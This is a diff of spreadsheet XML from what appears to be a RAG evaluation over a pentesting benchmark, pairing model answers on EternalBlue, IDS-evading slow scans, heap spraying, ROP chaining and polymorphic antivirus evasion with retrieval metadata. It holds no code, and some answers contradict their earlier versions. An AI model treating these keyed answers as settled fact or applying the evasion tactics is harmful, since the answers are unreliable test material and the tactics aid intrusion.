           <t>preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 0da02c07-0fe5-48ee-af2c-3db15d61708f, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I236" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J236" t="n">
@@ -16346,7 +16324,7 @@
       </c>
       <c r="K236" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16391,21 +16369,21 @@
       </c>
       <c r="H237" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 2)
+          <t>preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 1)
+preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I237" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J237" t="n">
@@ -16413,7 +16391,7 @@
       </c>
       <c r="K237" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16448,7 +16426,7 @@
       <c r="F238" t="inlineStr">
         <is>
           <t>Answer: EternalBlue vulnerability
-Explanation: The correct answer is the EternalBlue vulnerability because it specifically exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This was famously exploited by the WannaCry ransomware attack, which propagated rapidly across networks globally. Shellshock vulnerability targets vulnerabilities in the Unix Bash shell, Heartbleed affects the OpenSSL cryptographic software library, and Dirty COW is a privilege escalation vulnerability in the Linux Kernel, making them irrelevant to the context of network-level exploits relying on misuse of the SMB protocol by Windows systems.</t>
+Explanation: The EternalBlue vulnerability specifically exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This was famously exploited by the WannaCry ransomware attack, which propagated rapidly across networks globally.</t>
         </is>
       </c>
       <c r="G238" t="inlineStr">
@@ -16460,19 +16438,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: db19252d-9a5b-4623-a411-b045272677d0, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: a09e3e07-e30d-49fe-a572-62fa2b787041, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 2d288e67-2299-4d6a-b2b6-261bd12f66f0, Type: dense, Rank: 6)
 legacy-writeup-w-o-metasploit.md (Chunk: 220eb143-15bc-44fd-b9f9-d100667d4531, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: dense, Rank: 9)
-blue-writeup-w-o-metasploit.md (Chunk: 6bdfc453-8357-46e7-876e-6be098a52409, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1fef682b-fbe1-4f50-b24f-37a524926e24, Type: sparse, Rank: 8)
+blue-writeup-w-o-metasploit.md (Chunk: 6bdfc453-8357-46e7-876e-6be098a52409, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 18e2ae8c-7b32-42a9-9045-7872388878c2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I238" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J238" t="n">
@@ -16480,7 +16458,7 @@
       </c>
       <c r="K238" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16547,7 +16525,7 @@
       </c>
       <c r="K239" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16594,19 +16572,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 53d7a878-4bdf-406c-953f-62597a8f99a6, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: c68750ec-caab-464f-a343-de1db420fb17, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I240" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J240" t="n">
@@ -16614,7 +16592,7 @@
       </c>
       <c r="K240" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -16663,20 +16641,20 @@
       <c r="H241" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d2b5b7bb-3cbf-4369-9681-a363a52efce3, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 2c838caf-4fdc-47c9-ac53-31220f3a2f97, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c96b626d-950f-48a3-878e-fd81cae36046, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I241" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J241" t="n">
@@ -16684,7 +16662,7 @@
       </c>
       <c r="K241" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>

--- a/dataset_advanced_rag_temp.xlsx
+++ b/dataset_advanced_rag_temp.xlsx
@@ -521,7 +521,7 @@
       <c r="F2" t="inlineStr">
         <is>
           <t>Answer: Using sandboxing technologies to observe behavior
-Explanation: Using sandboxing technologies to observe behavior is the most effective technique for identifying the behavior of potential polymorphic malware. This approach allows analysts to see how malware operates in a controlled environment, making it possible to observe changes and behaviors without risking the integrity of the host system. Options such as 'Passing strings fetched at runtime through a disassembler' can be circumvented by malware that detects disassembler use. 'Intercepting and modifying system calls with the ptrace system call' might not reveal all behaviors, especially if the malware is aware and can disable or mislead ptrace. 'Examining the import address table for unexpected changes' is useful for static analysis but difficult, not a method of analysis itself.</t>
+Explanation: Using sandboxing technologies to observe behavior is the most effective technique for identifying the behavior of potential polymorphic malware. This approach allows analysts to see how malware operates in a controlled environment, making it possible to observe changes and behaviors without risking the integrity of the host system. Options such as 'Passing strings fetched at runtime through a disassembler' can be circumvented by malware that detects disassembler use. 'Intercepting and modifying system calls with the ptrace system call' might not reveal all behaviors, especially if the malware is aware and can disable or mislead ptrace. 'Examining the import address table for unexpected changes' is useful for static analysis but may be less effective in dynamic analysis scenarios where polymorphic malware can change its behavior on the fly.</t>
         </is>
       </c>
       <c r="G2" t="inlineStr">
@@ -535,21 +535,16 @@
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 04959762-acf0-4790-99fb-7524a2352b4c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I2" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J2" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K2" t="inlineStr">
         <is>
@@ -588,7 +583,7 @@
       <c r="F3" t="inlineStr">
         <is>
           <t>Answer: Using a slow, methodical scan technique
-Explanation: Using a slow, methodical scan technique is the best practice among the options to avoid detection by network intrusion detection systems. Slowing down the scan can help in making the traffic appear more like normal user behavior rather than automated scripts, thus blending with regular network traffic and avoiding triggers for anomaly-based detection systems. 'Scanning with all packet fragmentation options' might still be detected by modern IDS capable of reassembling fragmented packets to inspect the full payload. 'Conducting repeated scans from the same IP address' will likely get noticed quickly due to the rapid repetition and consistency, which is unusual for normal user behavior. 'Performing an aggressive scan with default settings' is more likely to trigger alarms as it generates a large amount of traffic and follows standard patterns that IDS systems are designed to detect.</t>
+Explanation: Using a slow, methodical scan technique is the best practice among the options to avoid detection by network intrusion detection systems. Slowing down the scan can help in making the traffic appear more like normal user behavior rather than automated scripts, thus blending with regular network traffic and avoiding triggers for anomaly-based detection systems. 'Scanning with all packet fragmentation options' might still be detected by modern IDS capable of reassembling fragmented packets to inspect the full payload. 'Conducting repeated scans from the same IP address' will likely get noticed quickly due to the repetitive nature of the activity, which could indicate a potential attack or scan. 'Performing an aggressive scan with default settings' is not recommended as it can generate a large amount of traffic and potentially trigger alarms in intrusion detection systems.</t>
         </is>
       </c>
       <c r="G3" t="inlineStr">
@@ -602,21 +597,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a50681c0-06cb-4ca1-821f-95ab56a6e118, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 94e49890-47aa-4ca3-9707-9d1cb00040dc, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I3" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J3" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K3" t="inlineStr">
         <is>
@@ -655,7 +645,7 @@
       <c r="F4" t="inlineStr">
         <is>
           <t>Answer: Executing a buffer overflow attack to gain unauthorized access
-Explanation: Executing a buffer overflow attack to gain unauthorized access is the most likely technique for carrying out a privilege escalation attack on modern Windows systems. This method involves exploiting software vulnerabilities to overrun a buffer boundary in memory, which can corrupt adjacent memory space and alter the execution path of a process to execute attacker-controlled code with elevated privileges. Option</t>
+Explanation: Executing a buffer overflow attack to gain unauthorized access is the most likely technique for carrying out a privilege escalation attack on modern Windows systems. This method involves exploiting software vulnerabilities to overrun a buffer boundary in memory, which can corrupt adjacent memory space and alter the execution path of a process to execute attacker-controlled code with elevated privileges.</t>
         </is>
       </c>
       <c r="G4" t="inlineStr">
@@ -669,21 +659,16 @@
 cowWhySo-pentest-redteam-steering.md (Chunk: 2e8a1379-0fba-4f7a-85eb-7b056917f4e4, Type: dense, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 2fa8fe7f-f321-44f6-85be-f75704ff9974, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 13ada395-dd1a-4edf-a2e1-2da891a263e1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: a51a6d26-c177-466b-aa2a-5de8d47c5fe0, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 35cb71f1-4ff9-4877-b911-d338ee000ffe, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: sparse, Rank: 8)
-cowWhySo-pentest-redteam-steering.md (Chunk: fdb9ace2-d2c3-419e-a845-2e85c4c092a9, Type: dense, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 726c1e0b-212c-426e-aa7c-3636c6fa101e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I4" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J4" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K4" t="inlineStr">
         <is>
@@ -721,8 +706,8 @@
       </c>
       <c r="F5" t="inlineStr">
         <is>
-          <t>Answer: Stack-based buffer overflow
-Explanation: In the context of developing an exploit for a remote code execution vulnerability discovered in a network service, stack-based buffer overflows are commonly utilized to manipulate memory layouts and facilitate arbitrary code execution. This technique involves supplying input that overflows the buffer boundaries, allowing an attacker to overwrite the return address of the stack frame. By doing so, the execution flow can be redirected to malicious payloads embedded in the input, effectively achieving remote code execution.</t>
+          <t>Answer: Heap spraying
+Explanation: In the context of developing an exploit for a remote code execution vulnerability discovered in a network service, heap spraying is most commonly utilized to manipulate memory layouts to facilitate arbitrary code execution. This technique involves flooding the heap with shellcode, which increases the likelihood that the attacker's code will be executed when the vulnerable program allocates memory from the heap. While stack-based buffer overflows and format string attacks can also lead to arbitrary code execution, they are less commonly used in network services due to modern protections like ASLR and DEP. Cross-site scripting is primarily relevant to web applications, not network services, and involves injecting scripts to be executed by web browsers.</t>
         </is>
       </c>
       <c r="G5" t="inlineStr">
@@ -736,21 +721,16 @@
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 54029d28-0316-4b60-b3a4-46cb1d3ed1b7, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I5" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J5" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K5" t="inlineStr">
         <is>
@@ -789,7 +769,7 @@
       <c r="F6" t="inlineStr">
         <is>
           <t>Answer: ROP chaining
-Explanation: In the context of modern exploit development for bypassing ASLR and DEP, ROP chaining (Return-Oriented Programming) is the most effective technique for executing arbitrary code when exploiting a buffer overflow vulnerability. This method manipulates the control flow of a program by executing small snippets of code already present in a program's memory (called 'gadgets'), effectively allowing an attacker to execute arbitrary code.</t>
+Explanation: ROP chaining, or Return-Oriented Programming, is highly effective in modern exploit development for bypassing Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). This technique manipulates the control flow of a program by executing small snippets of code already present in a program's memory (called 'gadgets'), effectively allowing an attacker to execute arbitrary code.</t>
         </is>
       </c>
       <c r="G6" t="inlineStr">
@@ -803,21 +783,16 @@
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 12e2112e-6dac-4ee5-bb17-ffc18f57f1ec, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I6" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J6" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K6" t="inlineStr">
         <is>
@@ -870,21 +845,16 @@
 preemware_pentestingeval.pdf (Chunk: 31ffffeb-832f-4ad4-8e53-d84f81a3e04f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ed0ba5f3-2b68-477d-b01e-8dc5589ac689, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 4)
-valentine-writeup-w-o-metasploit.md (Chunk: de47d363-c0ee-40e7-88d6-27a1f2501294, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: dense, Rank: 7)
-valentine-writeup-w-o-metasploit.md (Chunk: 864bf539-5c23-48a6-8683-57332c6287aa, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 93d14658-5b22-4616-b6e7-c1d7e8d2504c, Type: dense, Rank: 10)</t>
+valentine-writeup-w-o-metasploit.md (Chunk: de47d363-c0ee-40e7-88d6-27a1f2501294, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I7" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J7" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K7" t="inlineStr">
         <is>
@@ -923,7 +893,7 @@
       <c r="F8" t="inlineStr">
         <is>
           <t>Answer: Using a polymorphic engine to modify the malware's code
-Explanation: Using a polymorphic engine to modify the malware's code is the most effective method listed for evading signature-based antivirus detection while maintaining the original functionality of the malware. Polymorphism involves altering the malware's code in such a way that it maintains its core functions but has different binary patterns, making it difficult for simple signature-based detection to match the altered versions. While changing the malware's hash via basic encryption and using a common packer can also avoid detection, these methods are generally easier for modern antiviruses to detect through heuristic or behavior-based analysis. Altering the metadata of the malware file without changing the code does not affect the operational code, hence it's less likely to evade a scan that inspects code not metadata.</t>
+Explanation: Using a polymorphic engine to modify the malware's code is the most effective method listed for evading signature-based antivirus detection while maintaining the original functionality of the malware. Polymorphic engines generate multiple, varying instances of the same malware, altering its binary pattern without changing its core functions. This renders simple signature-based detection almost useless, as the signatures will not match the altered versions. Changing the malware's hash via basic encryption and using a common packer can also avoid detection, but these methods are generally easier for modern antiviruses to detect through heuristic or behavior-based analysis. Altering the metadata of the malware file without changing the code does not affect the operational code, hence it's less likely to evade a scan that inspects code not metadata.</t>
         </is>
       </c>
       <c r="G8" t="inlineStr">
@@ -937,21 +907,16 @@
 preemware_pentestingeval.pdf (Chunk: ee64972b-a5c2-4f26-8620-c7e453c7a373, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 9c8cb7b3-6564-437c-abb3-13701475b3c2, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 2ed8c0e8-d43e-4d09-a902-9e44e6d56c0b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I8" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J8" t="n">
